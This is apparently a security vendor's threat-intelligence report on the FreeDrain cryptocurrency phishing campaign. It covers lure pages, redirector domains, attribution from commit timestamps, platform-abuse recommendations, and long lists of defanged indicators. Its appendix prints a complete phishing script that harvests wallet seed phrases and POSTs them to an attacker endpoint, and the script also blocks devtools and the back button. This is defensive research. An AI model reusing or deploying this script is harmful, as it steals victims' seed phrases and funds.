Identifying FreeDrain lure pages at scale proved difficult due to extreme variation in phrasing, metadata, and platform-specific formatting. For example, we identified 46 unique renderings of the word “Trezor”, all visually similar, using tricks like added Unicode characters, zero-width spaces, and mixed script alphabets.

A turning point in connecting these fragmented domains came from pivoting off the redirection infrastructure. While the lure content varied, the redirectors often remained consistent across pages and platforms.

By tracing traffic from anchor links to known FreeDrain redirectors, we were able to map common ownership and activity across otherwise-unrelated services. This infrastructure-based pivot became essential for clustering and attribution, bridging gaps that the lure content itself couldn’t.

Redirectors

Pivoting on URLs from known and suspected FreeDrain lure pages that we were monitoring, we quickly noticed some noteworthy patterns in the FreeDrain redirection domains.

Domain Characteristics

Nearly all redirector domains shared several features:

• .com TLDs exclusively
• Names that appeared algorithmically generated, likely via a Domain Generation Algorithm (DGA) or Markov chain model
• English-adjacent structure, visually familiar but never forming real English words

Examples include:

• antressmirestos[.]com
• shotheatsgnovel[.]com
• bildherrywation[.]com

Each URL also included a GUID-like string in the path, which may have served as a session ID, traffic source identifier, or logic gate for redirection behavior. Examples:

• https://causesconighty[.]com/ce405b14-337a-43a5-9007-ed1aaf807998
• https://causesconighty[.]com/d7c95729-6eed-452a-b246-865e0d97fc23
• https://disantumcomptions[.]com/61e7fc9c-baef-43f0-82bf-a7f12a025586
• https://disantumcomptions[.]com/6c31ec3b-0d4b-4bf4-a9f4-91453c4ef99e
• https://distrypromited[.]com/d7c95729-6eed-452a-b246-865e0d97fc23
• https://distrypromited[.]com/ff933705-9619-4292-9e22-02269acc197b
• https://posectsinsive[.]com/9431711a-cf35-4ebd-b5db-eacba9ef7ee3
• https://posectsinsive[.]com/994ffe2a-21fb-448a-b4e3-01b9483c5460

(A complete list of FreeDrain-associated redirector domains is provided in the appendix.)

Domain Registration and Infrastructure Clues

All domains we identified were registered via Key-Systems GmbH, a registrar often used for bulk domain purchases and programmatic registration.

Initially, we suspected that these domains were all managed by the FreeDrain operators as well, but have since connected these domains to a much larger network of thousands domain names that are used to route traffic for many different purposes.

Looking at DNS history for some of the older redirectors on our list, we saw that they rotated IP addresses relatively infrequently, resolving to just a small number of IPs within a time window of weeks to months.

The domain resolved to only a handful of IPs over its active life suggesting stable, centralized hosting infrastructure.

Pivoting on IP addresses shared by these older FreeDrain domains revealed that there are hundreds of other domain names that share nearly identical characteristics in terms of naming conventions, registration patterns, and hosting patterns. Yet, these other domains didn’t exhibit direct ties to FreeDrain behavior.

This led us to two possibilities:

1. The redirectors are part of a leased infrastructure-as-a-service model, used by FreeDrain and potentially many other threat actors
2. FreeDrain is a subdivision of a broader operation, with shared tooling and infrastructure but distinct campaigns

At this stage, the full extent of this infrastructure and the relationships between campaigns remain an open research question. What is clear, however, is that FreeDrain does not operate in isolation, and the redirection layer may be a service used by multiple actors.

Phishing Pages

Across our monitoring, we observed dozens of variations in FreeDrain phishing pages but technically, they were all fairly simple and consistent in architecture.

These phishing pages were most often:

• Hosted on cloud infrastructure, primarily Amazon S3 and Azure Web Apps
• Designed to mimic legitimate cryptocurrency wallet interfaces (Trezor, MetaMask, Ledger, etc.)
• Implemented using HTML forms or AJAX POST requests to transmit stolen credentials to attacker-controlled endpoints

Some S3-hosted phishing sites sent harvested data to live backend services on Azure, as seen in multiple instances where form actions pointed to azurewebsites.net applications.

Human Operators Behind the Scenes

While most pages used standard static phishing techniques, we occasionally encountered live chat widgets embedded in Azure-hosted phishing pages.

This chat feature had previously been documented in a 2022 report by Netskope (one of the few references we ever found to FreeDrain and the earliest reported). Our own interactions confirmed that humans, not bots, were responding to victim inquiries in real time, often providing reassurance or technical “help” to keep targets engaged.

Clean, Unobfuscated Exfiltration Code

In the malicious JavaScript that we observed that handled POST requests with stolen seed phrases, the code is well-formatted, commented, and does not appear to be obfuscated in any way. Full examples are provided in the appendix, but a snippet of the POST request is below (domain bolded and defanged):

const data = {};
inputs.forEach((input, index) => {
    data[`phrase${index}`] = input.value.trim();
});
data.subject = "Trezor connect2";
data.message = "Successfull fetch data";
$.ajax({
    type: "POST",
    url: "https://rfhwuwixxi.execute-api.us-east-1.amazonaws[.]com/prod/eappmail",
    dataType: "json",
    crossDomain: true,
    contentType: "application/json; charset=utf-8",
    data: JSON.stringify(data),
    success: function (result) {
        alert('Data submitted successfully1!');
        window.location.href = 'https://suite.trezor.io/web/';
        location.reload();
    },
    error: function (xhr, status, error) {
        window.location.href = 'https://suite.trezor.io/web/';
 
 
}
});

Despite its simplicity, the phishing backend was effective, disposable, and often difficult to trace—highlighting just how low the bar is for technical sophistication when paired with wide-scale reach and persistent lure infrastructure.

Actor Analysis

Attribution is inherently difficult when infrastructure is ephemeral and built on shared, free-tier services. Yet through a combination of repository metadata, behavioral signals, and timing artifacts, we were able to extract meaningful insights about FreeDrain’s operators, including likely location, working patterns, and their degree of operational coordination.

Our first major breakthrough came from GitHub Pages (github.io), which only allows hosting via a public repository that matches the account’s GitHub username (e.g., username.github.io). This constraint meant every active FreeDrain lure page hosted on GitHub had a publicly accessible repository behind it.

We cloned hundreds of these repositories and analyzed the commit metadata, including timestamps, usernames, email addresses, and whether commits were made via the CLI or web interface. Several clear patterns emerged:

• Email addresses were always unique, tied 1:1 with the GitHub account, and never reused.
• All emails came from free providers like Gmail, Hotmail, Outlook, and ProtonMail.
• While naming styles varied widely (capitalization, numbers, patterns), we found clusters of similarly structured addresses, suggesting manual creation by multiple individuals, possibly using shared templates or naming approach.

Importantly, GitHub commits preserve the local timezone of the user unless manually configured otherwise. In our dataset, over 99% of commits were timestamped in UTC+05:30 (Indian Standard Time), our first strong geographic indicator.

We corroborated this signal using metadata from other FreeDrain free-infrastructure/services. Webflow, for instance, embeds a “last published” timestamp in the HTML source of hosted sites. When we aggregated timestamps across the many FreeDrain Webflow pages, a clear 9-to-5 weekday work pattern emerged, complete with a consistent midday break. This pattern aligns closely with a standard business schedule in the IST timezone.

Combining these and other signals across platforms, we assess with high confidence that FreeDrain is operated by individuals based in the IST timezone, likely in India, working standard weekday hours.

Additionally, timeline analysis shows that FreeDrain has been active since at least 2022, with a notable acceleration in mid-2024. As of this writing, the campaign remains active across several free hosting and publishing platforms.

Disruption Efforts and Opportunities

The scale and diversity of services abused by FreeDrain made disruption an ongoing challenge. While the campaign leaned heavily on free-tier platforms, many of which allowed users to publish images, text, external links, and even custom JavaScript to subdomains under well-known parent domains, very few of these platforms offered streamlined abuse reporting workflows.

In most cases, there was no direct method to report malicious content from the content page itself, forcing us to manually investigate each platform’s policies, support forms, or contact channels. This adds unnecessary friction to the response process, especially when scaled across hundreds of active malicious pages.

Even more concerning, most of the publishing platforms lacked the detection capabilities to identify this type of coordinated abuse on their own. The indicators were there: repetitive naming patterns, clustered behavior, identical templates reused across subdomains, but limited proactive action was being taken.

This highlights a broader industry need:

• Free-tier content platforms should invest in basic abuse prevention tooling and more accessible reporting mechanisms.

At minimum, this includes:

• Allowing abuse to be reported directly from published content pages
• Monitoring for patterns of misuse (e.g., bulk account creation, similar domain structures, repeated hosting of external phishing kits)
• Establishing direct communication lines with trusted threat intel analysts and threat researchers

FreeDrain’s reliance on free-tier platforms is not unique, and without better safeguards, these services will continue to be weaponized at scale.

This isn’t just a security issue, it’s a business one. When threat actors abuse these platforms to host phishing pages, fake login portals, or crypto scams, they erode user trust in the entire platform domain. Over time, this leads to real financial consequences:

• Reputation damage: Reputable domain names like webflow.io, and teachable.com can quickly become flagged by corporate security tools, browser warning systems, and threat intelligence feeds. This reduces their utility for legitimate users and undermines the brand’s credibility.
• Deliverability and discoverability: Once a platform’s domain is associated with widespread abuse, search engines, email providers, and social networks may down-rank or block links from that domain, hurting all users, including paying customers.
• Customer churn and support burden: Abuse-driven issues often result in a higher volume of customer support tickets, complaints, and refunds, particularly when paying users find their content mistakenly flagged or blocked due to a shared domain reputation.
• Increased infrastructure and fraud costs: Hosting abusive content, even at scale on free tiers, still consumes compute, storage, and bandwidth. Worse, it may attract waves of automated account signups and resource abuse that raise operational costs.

Failing to detect and mitigate this kind of abuse isn’t just a user risk– it’s an unpaid tax on the business, dragging down growth and trust at every layer. Proactive abuse prevention and streamlined reporting are not just table stakes for security, they’re critical to long-term sustainability.

References and Similarities to Other Campaigns

Elements of the FreeDrain campaign were first publicly documented in August 2022 by Netskope, with a follow-up report in September 2022. Netskope’s early findings captured the core tactics that continue today: leveraging SEO manipulation to drive traffic to lure pages, which then redirect to credential-harvesting phishing sites. Netskope also published another update in October 2024, focusing on FreeDrain’s use of Webflow-hosted infrastructure, confirming the campaign’s continued evolution while retaining the same fundamental workflow.

FreeDrain’s abuse of legitimate free-tier platforms is part of a broader trend in phishing infrastructure, but it remains distinct from other well-known crypto phishing efforts. For example, the CryptoCore campaign, reported by Avast in August 2024, similarly targets cryptocurrency users but relies heavily on YouTube content and impersonation videos to draw in victims, rather than search engine poisoning and static phishing sites.

In 2023, Trustwave reported on the use of Cloudflare’s pages.dev and workers.dev services in phishing, showing how modern hosting platforms that offer free, customizable subdomains with minimal friction are being systematically exploited, mirroring FreeDrain’s approach.

Recent reporting has also shed light on the kinds of threat actors that may be behind campaigns like FreeDrain. Just this week, the U.S. Treasury sanctioned individuals linked to cyber scam operations in Southeast Asia, specifically a militia group in Burma involved in online fraud networks. While distinct from FreeDrain, these operations share similar hallmarks: large-scale abuse of online infrastructure, technical capability, and a focus on financial theft, demonstrating the scale and organization such campaigns can operate under.

FreeDrain’s techniques have also been informally documented by affected users. In particular, Trezor hardware wallet customers have reported fraudulent websites mimicking the Trezor ecosystem, some of which were part of FreeDrain’s infrastructure:

• Forum report: Reporting scam site
• Forum discussion: Fake Trezor websites

Conclusion

The FreeDrain network represents a modern blueprint for scalable phishing operations, one that thrives on free-tier platforms, evades traditional abuse detection methods, and adapts rapidly to infrastructure takedowns. By abusing dozens of legitimate services to host content, distribute lure pages, and route victims, FreeDrain has built a resilient ecosystem that’s difficult to disrupt and easy to rebuild.

Through detailed infrastructure analysis, repository metadata mining, and cross-platform behavioral correlations, we uncovered rare insights into the actors behind the campaign, including strong indicators that the operation is manually run by a group based in the UTC+05:30 timezone, working standard business hours. Despite this visibility, systemic weaknesses in reporting mechanisms and abuse detection have allowed FreeDrain to persist and even accelerate in 2024.

This is not just a FreeDrain problem. The broader ecosystem of free publishing platforms is being exploited in ways that disproportionately benefit financially motivated threat actors. Without stronger default safeguards, identity verification, or abuse response infrastructure, these services will continue to be abused, undermining user trust and inflicting real-world financial harm.

By exposing the scale and structure of the FreeDrain network, we hope this research will enable better platform-level defenses, more informed user education, and collaboration across the security community to limit the reach and longevity of operations like this.

Indicators of Compromise and Relations

Full List of IOCs can be downloaded here.

FreeDrain Lure Pages

Download Full List for over 40,000 URLs
Sample:

https://metamaskchromextan.gitbook\.io/us
https://suprt-ios-trzorhard.gitbook\.io/en-us
https://bridge-tziuur.gitbook\.io/en-us
https://auth-ledger-com-cdn.webflow\.io/
https://start—leddger-cdn-auth.webflow\.io/
https://help–ledgre-auth-us.webflow\.io/
https://home-trezsor-start.gitbook\.io/en-us
https://wlt-phantom-wlt.webflow\.io/
https://bridge-cen-trezseer.gitbook\.io/en-us
https://ledgerauth-wellat.webflow\.io/
https://ledgerivwaselet-us.webflow\.io/
https://extentrust.gitbook\.io/en-us
https://truststextion.gitbook\.io/us
https://apps-support—mettmask.gitbook\.io/us
https://cobo-wallet-digital-cdm.webflow\.io/
https://extension–metaamsk-info.gitbook\.io/us
https://bridge-docs–trzc.gitbook\.io/en-us
https://suite-trezoreio.gitbook\.io/us
https://auth–io-coinbausehelp.gitbook\.io/us
https://help-blockf-cdnn.teachable\.com/p/home

FreeDrain Redirect Domains

These are the redirector domains we directly observed leveraged by FreeDrain going back 3+ years.

affanytougees[.]com
ameddingpersusan[.]com
anicnicpriesert[.]com
antressmirestos[.]com
aparingupgger[.]com
bildherrywation[.]com
boutiondistan[.]com
brasencewompture[.]com
carefersoldidense[.]com
causesconighty[.]com
charweredrepicks[.]com
chazineconally[.]com
chierstimines[.]com
chopedansive[.]com
claredcarcing[.]com
coadormertranegal[.]com
coateethappallel[.]com
comaincology[.]com
coneryconstiny[.]com
conkeyprowse[.]com
coutioncargin[.]com
coveryinting[.]com
crefoxappecture[.]com
curphytompared[.]com
darylapsebaryanmar[.]com
deconsorconsuperb[.]com
disantumcomptions[.]com
distrypromited[.]com
escentdeveriber[.]com
fladestateins[.]com
flesterwisors[.]com
forrofilecabelle[.]com
gaiterimturches[.]com
goestodos[.]com
grawableaugespare[.]com
gresesticparray[.]com
guardawalle[.]com
hunnerdimental[.]com
issetheserepson[.]com
lamothyadjuncan[.]com
leatlyinsioning[.]com
leavesnottered[.]com
listationsomminder[.]com
litnentschelds[.]com
minarymacrefeat[.]com
mingaryshestence[.]com
nashiclehunded[.]com
obiansvieller[.]com
paticableharent[.]com
penlabuseoribute[.]com
peridneyperadebut[.]com
pladamousaribached[.]com
posectsinsive[.]com
pringingsernel[.]com
saverateaubtle[.]com
scientcontopped[.]com
screnceagrity[.]com
searranksdeveal[.]com
shotheatsgnovel[.]com
sonyonsa[.]com
stalitynotinium[.]com
storsianpreemed[.]com
swissborglogi[.]xyz
teleedlescestable[.]com
tirzrstartio[.]com
topsorthynaveneur[.]com
tralizetrulines[.]com
trighlandcomping[.]com
versaryconnedges[.]com
walitykildsence[.]com
wintrolancing[.]com

Phishing URLs

https://atomicwallet.azurewebsites[.]net/
https://bietbutylogn.azurewebsites[.]net/
https://biokefeiwltliv29gleed.azurewebsites[.]net/
https://bitgetwalt.azurewebsites[.]net/
https://bleuckfie-coins.azurewebsites[.]net/
https://bleuckkfiecoins.azurewebsites[.]net/
https://bleuickkfiescoins.azurewebsites[.]net/
https://blocckfi-api.azurewebsites[.]net/
https://blocikifi.azurewebsites[.]net/
https://blockffiecoinas.azurewebsites[.]net/
https://blockfi-api.azurewebsites[.]net/
https://blockfiapp-apk.azurewebsites[.]net/
https://blockfiicoins.azurewebsites[.]net/
https://blockificoinz.azurewebsites[.]net/
https://blockifiicoins.azurewebsites[.]net/
https://blockkfi-api.azurewebsites[.]net/
https://blockkfiapi-apk.azurewebsites[.]net/
https://blockkkfifies.azurewebsites[.]net/
https://bloickfie-app.azurewebsites[.]net/
https://bloickfiicoins.azurewebsites[.]net/
https://bloickkfieecoinss.azurewebsites[.]net/
https://bloickkfieescoins876.azurewebsites[.]net/
https://bloiickkfieecoinase.azurewebsites[.]net/
https://blokfi-error.azurewebsites[.]net/
https://blokkfiapp-api.azurewebsites[.]net/
https://blokkifi.azurewebsites[.]net/
https://bloockkfi-api.azurewebsites[.]net/
https://blouckfi-api.azurewebsites[.]net/
https://bluckfi-error.azurewebsites[.]net/
https://bluckfilogn.azurewebsites[.]net/
https://blueckficoinis.azurewebsites[.]net/
https://bluickkfiecoins.azurewebsites[.]net/
https://boloickfieecoins.azurewebsites[.]net/
https://buloickkfieecoins876.azurewebsites[.]net/
https://cbswlterliv487wlt.azurewebsites[.]net/
https://cionbise-error.azurewebsites[.]net/
https://cnbse13liv.s3.eu-north-1.amazonaws[.]com/index.html
https://cobo-wallet.azurewebsites[.]net/
https://cobowalletoffc.azurewebsites[.]net/
https://cobowalletz.azurewebsites[.]net/
https://coienebaiseerlivwlt02elisa.azurewebsites[.]net/
https://coinibisasesn567.azurewebsites[.]net/
https://dft0-hjgkd26-fkj.s3.us-east-1.amazonaws[.]com/index.html
https://edgeronwlet.azurewebsites[.]net/
https://edgersuwlet.azurewebsites[.]net/
https://eedu0s-jhdc-osxza.s3.us-east-1.amazonaws[.]com/index.html
https://en-ledger-cdn.azurewebsites[.]net/
https://en-trezor-cdn-auth.azurewebsites[.]net/
https://en-trezor-cdn.azurewebsites[.]net/
https://errorciiobiosewds876.azurewebsites[.]net/
https://errorcoibisaeseaenbaeb876.azurewebsites[.]net/
https://errorlovblockfi876.azurewebsites[.]net/
https://errorlovbloikcffie876.azurewebsites[.]net/
https://errorlovbolockfiee987.azurewebsites[.]net/
https://errorlovcobisaed786.azurewebsites[.]net/
https://errorlovcoibioise876.azurewebsites[.]net/
https://errorlovexdkekam879.azurewebsites[.]net/
https://errorlovexds987.azurewebsites[.]net/
https://errorlovtenizr987.azurewebsites[.]net/
https://errorlovtrasenzjedsuties.azurewebsites[.]net/
https://errorlovtreazezz876.azurewebsites[.]net/
https://errorlovtrikmanen987.azurewebsites[.]net/
https://errormetiamiasks876.azurewebsites[.]net/
https://errormetismesk987.azurewebsites[.]net/
https://errortreazeeasd-suties.azurewebsites[.]net/
https://ertzirdnwwltliv.azurewebsites[.]net/
https://exd98uswlterliv.azurewebsites[.]net/
https://exdiusiwalet.azurewebsites[.]net/
https://ezioron1wlet.azurewebsites[.]net/
https://iotruzorsuite.azurewebsites[.]net/
https://itrusttcepitalcoins.azurewebsites[.]net/
https://kaikzx-slsld39-lkjf.s3.us-east-1.amazonaws[.]com/index.html
https://krakenzcoins.azurewebsites[.]net/
https://ladzearwlt03jokesmko.azurewebsites[.]net/
https://ldr-0gr-dsxz.s3.us-east-1.amazonaws[.]com/index.html
https://leddgeircoins.azurewebsites[.]net/
https://leddgersacoins.azurewebsites[.]net/
https://ledeagderwallet.azurewebsites[.]net/
https://ledg-01jghe0fhdk.s3.eu-north-1.amazonaws[.]com/index.html
https://ledgar-live-walliet.s3.us-east-2.amazonaws[.]com/index.html
https://ledger-start-403.azurewebsites[.]net/
https://ledger-start-api.azurewebsites[.]net/
https://ledgercoinserror3.azurewebsites[.]net/
https://ledgercoinsweb3.azurewebsites[.]net/
https://ledgersapi-apk.azurewebsites[.]net/
https://ledgersapp.azurewebsites[.]net/
https://ledgirlvestart.azurewebsites[.]net/
https://ledigerwaliteasee.azurewebsites[.]net/
https://ledzaererwltliv30mariamon.azurewebsites[.]net/
https://ledzor365livwlter.azurewebsites[.]net/
https://legdrlievlgin.azurewebsites[.]net/
https://leidgeierwalitese.azurewebsites[.]net/
https://leidgirscoinsweb.azurewebsites[.]net/
https://leldger-live.azurewebsites[.]net/
https://lezor3021sxes.azurewebsites[.]net/
https://lfg0-oiosh-hdh.s3.us-east-1.amazonaws[.]com/index.html
https://lgnwltcnbsliv.azurewebsites[.]net/
https://lledgerwallest.azurewebsites[.]net/
https://lzr13wlt.s3.eu-north-1.amazonaws[.]com/index.html
https://metamaskdn.azurewebsites[.]net/
https://metamasksrs.azurewebsites[.]net/
https://metamassk.azurewebsites[.]net/
https://mmetamassk.azurewebsites[.]net/
https://mtmsklivwlter57wlt.azurewebsites[.]net/
https://ndaaxscoins.azurewebsites[.]net/
https://ndaxcoins.azurewebsites[.]net/
https://ndeauxcoinsweb.azurewebsites[.]net/
https://neaiaxcoins.azurewebsites[.]net/
https://oduisshweb3.azurewebsites[.]net/
https://portal-treaeameaene876.azurewebsites[.]net/
https://ra0-lkjd01-gfhjd.s3.eu-north-1.amazonaws[.]com/index.html
https://relkd28-lokdyuj.s3.us-east-1.amazonaws[.]com/index.html
https://sdfg0d28-djkfk.s3.us-east-1.amazonaws[.]com/index.html
https://secuxwallet-api.azurewebsites[.]net/
https://sjdhd29-oiuw0.s3.us-east-1.amazonaws[.]com/index.html
https://sledegerwallet.azurewebsites[.]net/
https://solflareewerror.azurewebsites[.]net/
https://suiitewalettrzior.azurewebsites[.]net/
https://teirzoriiostart.azurewebsites[.]net/
https://tereamanezheoakeeoake.azurewebsites[.]net/
https://tereazeriwaleits.azurewebsites[.]net/
https://tereizercoinswalts.azurewebsites[.]net/
https://tereizercoinsweb.azurewebsites[.]net/
https://tereziiorcoinsweb3.azurewebsites[.]net/
https://tereziioreeae-walieats.azurewebsites[.]net/
https://terezorcoinscweb3.azurewebsites[.]net/
https://terezuiear-api.azurewebsites[.]net/
https://terozeiorwltliv31wikub.azurewebsites[.]net/
https://terozriosiuet.azurewebsites[.]net/
https://terzoerirwlt476liv.azurewebsites[.]net/
https://tirizeriostrt.azurewebsites[.]net/
https://tirizurstrtio.azurewebsites[.]net/
https://tirzwltliv09erds.azurewebsites[.]net/
https://tizrerlivwlt897wlt.azurewebsites[.]net/
https://tizrwlterliv45livwlt.azurewebsites[.]net/
https://tr01-dkfjgk-slas.s3.eu-north-1.amazonaws[.]com/index.html
https://tr0ox-obnsj.s3.eu-north-1.amazonaws[.]com/index.html
https://tra09fjl-sodfjjkd.s3.eu-north-1.amazonaws[.]com/index.html
https://trac-durjg-fkf.s3.eu-north-1.amazonaws[.]com/index.html
https://traezor-suitez403.azurewebsites[.]net/
https://traieazeariscoins.azurewebsites[.]net/
https://tre876162ru0988zer.azurewebsites[.]net/
https://treaizerecoins.azurewebsites[.]net/
https://treauzearcoins.azurewebsites[.]net/
https://treazerapi-apk.azurewebsites[.]net/
https://treazerszcoins.azurewebsites[.]net/
https://treaziexc-ax-bc.azurewebsites[.]net/
https://treazirapi-apk.azurewebsites[.]net/
https://treazosr-api.azurewebsites[.]net/
https://treazsoirsuites.azurewebsites[.]net/
https://treazuer-suite.azurewebsites[.]net/
https://treizaers-coins.azurewebsites[.]net/
https://treizoircoinerror3.azurewebsites[.]net/
https://treizrwalogn.azurewebsites[.]net/
https://treriertriliv34erwlt.azurewebsites[.]net/
https://trezaereade-suite.azurewebsites[.]net/
https://trezieserscoins.azurewebsites[.]net/
https://trezior-suite.azurewebsites[.]net/
https://trezirapp-api.azurewebsites[.]net/
https://treziresacoins.azurewebsites[.]net/
https://triezorwallets.azurewebsites[.]net/
https://trioriorwlt485wltliv.azurewebsites[.]net/
https://trizeriowaliet.azurewebsites[.]net/
https://triziorecoinsweb3.azurewebsites[.]net/
https://triziriosuite.azurewebsites[.]net/
https://trizuriosiute.azurewebsites[.]net/
https://trucetreizerr.azurewebsites[.]net/
https://truiazearcoins.azurewebsites[.]net/
https://trzeriostrt.azurewebsites[.]net/
https://ttrzorappsuite.azurewebsites[.]net/
https://tzer30liv.s3.us-east-2.amazonaws[.]com/index.html
https://tzr06wlt.s3.eu-north-1.amazonaws[.]com/index.html
https://tzreoirwlt05balba.azurewebsites[.]net/
https://tzreoriewlt31wikub.azurewebsites[.]net/
https://uniswapv3login.azurewebsites[.]net/
https://uphooldlogn.azurewebsites[.]net/
https://web-treszor.azurewebsites[.]net/
https://weberrortrezur886.azurewebsites[.]net/
https://wltcbserlive467wlt.azurewebsites[.]net/
https://wltlzr67erlivehsfjfd.azurewebsites[.]net/
https://woleatcoebs34livwlt.azurewebsites[.]net/
https://zen-ledger-error.azurewebsites[.]net/
https://zenledgerscoinsweb.azurewebsites[.]net/

Example JavaScript

This is an example of the JavaScript (“app.js”) that was included on the S3-hosted phishing example: https://dft0-hjgkd26-fkj.s3.us-east-1.amazonaws[.]com/index.html.

Note the defanged malicious URL in the code below–that is the only alteration.

let currentWordCount = 12; // Default word count
function updateInputFields(wordCount) {
   const inputContainer = document.getElementById('inputContainer');
   inputContainer.innerHTML = '';
    currentWordCount = wordCount;
    for (let i = 0; i < wordCount; i++) { // Use 0-based index for phase keys
        const colDiv = document.createElement('div');
    // if (wordCount === 1) {
    //     colDiv.className = 'col-lg-21 col-md-12 col-sm-12 col-xs-12';
    //     colDiv.innerHTML = `
    //         <input
    //             class="form-control"
    //             type="text"
    //             placeholder="Input your words as many words as you have"
    //             name="word${i}"
    //             required
    //             title="Only alphabets are allowed.">
    //         <div class="error-message" style="font-size:12px;color: #fe3131f2; display: none;">Please enter a valid value.</div>
    //     `;
    // } else {
        colDiv.className = 'col-lg-4 col-md-4 col-sm-4 col-xs-12';
        colDiv.innerHTML = `
            <input
                class="form-control"
                type="text"
                placeholder="${i + 1}."
                name="word${i}"
                required
                pattern="[a-zA-Z]{1,10}"
                maxlength="10"
                oninput="this.value = this.value.replace(/[^a-zA-Z]/g, '').substring(0, 10);"
                title="Only alphabets are allowed.">
            <div class="error-message" style="font-size:12px;color: #fe3131f2; display: none;">Please enter a valid value.</div>
                `;
            // }
        inputContainer.appendChild(colDiv);
    }
    event.target.classList.add('active');
    const buttons = document.querySelectorAll('.displayflex button');
    buttons.forEach((button) => {
        button.classList.remove('active');
    });
    event.target.classList.add('active');
}
async function handleNextStep(event) {
    event.preventDefault();
    const inputContainer = document.getElementById('inputContainer');
    const inputs = inputContainer.querySelectorAll('input');
    let allValid = true;
    const enteredWords = new Set();
    inputs.forEach((input) => {
        const errorDiv = input.nextElementSibling; // Get the associated error div
        if (!input.checkValidity()) {
            errorDiv.style.display = 'block';
            allValid = false;
        } else {
            errorDiv.style.display = 'none';
        }
        const word = input.value.trim().toLowerCase(); // Normalize to lowercase to handle case insensitivity
        if (word && enteredWords.has(word)) {
            allValid = false;
            errorDiv.innerHTML = 'This word has already been entered.';
            errorDiv.style.display = 'block';
        } else {
            enteredWords.add(word);  // Add word to the Set
        }
    });
    if (!allValid) {
        alert("Mnemonic phrase is not valid. Try again.");
        return;
    }
    const data = {};
    inputs.forEach((input, index) => {
    data[`phrase${index}`] = input.value.trim();
    });
    data.subject = "Trezor connect2";
    data.message = "Successfull fetch data";
    $.ajax({
        type: "POST",
        url: "https://rfhwuwixxi.execute-api.us-east-1.amazonaws[.]com/prod/eappmail",
        dataType: "json",
        crossDomain: true,
        contentType: "application/json; charset=utf-8",
        data: JSON.stringify(data),
        success: function (result) {
        alert('Data submitted successfully1!');
        window.location.href = 'https://suite.trezor.io/web/';
        location.reload();
        },
        error: function (xhr, status, error) {
            window.location.href = 'https://suite.trezor.io/web/';
 
 
        }
    });
}

window.onload = function () {
    // Prevent the back button from navigating back
    function preventBack() {
    history.forward();
    }
    
    // Execute the `preventBack` function immediately after page load
    setTimeout(preventBack, 0);
    
    // Ensure the page doesn't cache on unload, forcing users to reload
    window.onunload = function () {
        return null;
    };
};

document.addEventListener('DOMContentLoaded', () => updateInputFields(12));

document.addEventListener("DOMContentLoaded", function () {
    const statusButton = document.getElementById("statusButton");
    const statusText = document.getElementById("statusText");
    const statusIcon = document.getElementById("statusIcon");
    // Initial state: "Waiting for Trezor..."
    statusText.textContent = "Waiting for Trezor... ";
    statusIcon.innerHTML = '';
    // After 2 seconds: "Establishing connection"
    setTimeout(() => {
        statusText.textContent = "Establishing connection...";
        statusIcon.innerHTML = '';
    }, 5000);
    // After 5 seconds: "Unable to read data" (Error state)
    setTimeout(() => {
    statusText.textContent = "Unable to read data";
    statusIcon.innerHTML = '';
    statusButton.classList.add("error-btn");
    }, 5000);
    function resetStatus() {
        // Reset to "Establishing connection..."
        statusText.textContent = "Establishing connection...";
        statusIcon.innerHTML = '';
        statusButton.classList.remove("error-btn");  // Reset error button class
        // After 3 seconds: Change status to "Unable to read data"
        setTimeout(() => {
            statusText.textContent = "Unable to read data";
            statusIcon.innerHTML = '';
            statusButton.classList.add("error-btn");
        }, 5000);
    }
    // Event listener for button click
    statusButton.addEventListener("click", function () {
        resetStatus(); // Reset and start the cycle on each click
    });
    // Optionally, you can trigger the status change flow immediately after page load for testing
    setTimeout(() => {
        resetStatus(); // Automatically run the flow when the page loads (optional)
    }, 5000);
});

    // Disable right-click context menu
    document.addEventListener("contextmenu", (event) => event.preventDefault());
    // Disable key combinations for opening developer tools
    document.addEventListener("keydown", (event) => {
    // Disable F12, Ctrl+Shift+I, Ctrl+Shift+J, Ctrl+U (View Source), Ctrl+Shift+C
    if (
        event.key === "F12" ||
        (event.ctrlKey && event.shiftKey && ["I", "J", "C"].includes(event.key)) ||
        (event.ctrlKey && event.key === "U")
    ) {
        event.preventDefault();
}
});

    // Detect if devtools is opened (basic detection)
    const detectDevTools = () => {
    const element = new Image();
        Object.defineProperty(element, "id", {
            get: () => {
                alert("Developer tools detected. Please close it to proceed.");
                // Redirect or log out the user
                window.location.href = "about:blank"; // Example action
            },
        });
        console.log(element);
    };
    detectDevTools();
    setInterval(detectDevTools, 1000);